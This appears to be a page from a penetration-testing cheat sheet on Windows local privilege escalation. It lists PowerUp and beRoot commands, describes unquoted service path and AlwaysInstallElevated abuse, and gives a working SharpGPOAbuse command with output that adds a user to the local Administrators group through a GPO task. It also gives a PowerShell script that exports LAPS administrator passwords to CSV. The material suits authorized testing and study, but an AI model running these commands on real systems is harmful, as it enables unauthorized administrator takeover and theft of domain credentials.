Local PrivEsc

. .\PowerUp.sp1
Invoke-AllChecks

Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose

.\beRoot.exe
Invoke-PrivEsc

  • Find for some Unquoted Service Path Vulnerabilities

  • Check for some modifiable registry autoruns and configs

Unquoted service path is when a Windows service is installed, it is associated with an executable file that defines what the service does

This executable file is specified by a file path. If the file path contains spaces and is not enclosed in quotation marks, Windows might misinterpret it - allowing attackers to replace the payload with the original executable

  • Now restart the machine so that the service gets restarted !

AlwaysInstallElevated

  • AlwaysInstallElevated is a type of Registry Escalation, this is equivalent to granting full control just like the admin rights - An attacker can potentially drop a malicious msi and get a reverse shell

  • Refer this writeup

Abusing GPO permissions

We Abusing GPO by adding the user to the local Administrators group leveraging a tool called SharpGPOAbuse.exe

# Add user to local administrator groups

PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

Export LAPS Passwords

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\temp\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation

Save it

C:\Scripts\LAPSexport.ps1

Then, run the script to verify it works correctly. If it does, you should automate this procedure by creating a Scheduled Task

PreviousEnumerationNextRemoting

Last updated